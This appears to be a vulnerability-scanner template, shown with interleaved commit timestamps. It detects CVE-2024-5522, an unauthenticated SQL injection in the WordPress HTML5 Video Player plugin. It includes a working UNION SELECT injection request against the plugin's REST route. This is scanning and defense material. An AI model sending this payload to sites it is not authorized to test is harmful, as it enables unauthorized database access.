2024-06-26 12:25:27 +00:00
id : CVE-2024-5522
info :
2024-07-01 06:14:17 +00:00
name : WordPress HTML5 Video Player < 2.5.27 - SQL Injection
2024-06-26 12:25:27 +00:00
author : JohnDoeAnonITA
2024-07-01 06:14:17 +00:00
severity : critical
2024-06-26 12:25:27 +00:00
description : |
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
2024-07-01 06:14:17 +00:00
remediation : Fixed in 2.5.27
2024-06-26 12:25:27 +00:00
reference :
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
2024-07-01 06:14:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
2024-06-26 12:25:27 +00:00
classification :
2024-07-01 06:14:17 +00:00
cvss-score : 9.8
cwe-id : CWE-89
2024-06-26 12:25:27 +00:00
cve-id : CVE-2024-5522
epss-score : 0.04
epss-percentile : 9
2024-09-10 08:22:50 +00:00
cpe : cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
2024-06-26 12:25:27 +00:00
metadata :
2024-07-01 06:14:17 +00:00
verified : true
2024-06-26 12:25:27 +00:00
max-request : 1
2024-07-01 06:14:17 +00:00
publicwww-query : "/wp-content/plugins/html5-video-player"
2024-09-10 08:22:50 +00:00
product : html5_video_player
vendor : bplugins
2024-07-01 06:14:17 +00:00
tags : wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player
2024-06-26 12:25:27 +00:00
2024-07-01 06:14:17 +00:00
variables :
num : "999999999"
2024-06-26 12:25:27 +00:00
http :
- method : GET
path :
2024-07-01 06:14:17 +00:00
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"
2024-06-26 12:25:27 +00:00
matchers-condition : and
matchers :
2024-07-01 06:14:17 +00:00
- type : word
part : body
words :
- '{{md5(num)}}'
2024-06-26 12:25:27 +00:00
- type : status
status :
- 200
2024-09-10 08:22:50 +00:00
# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950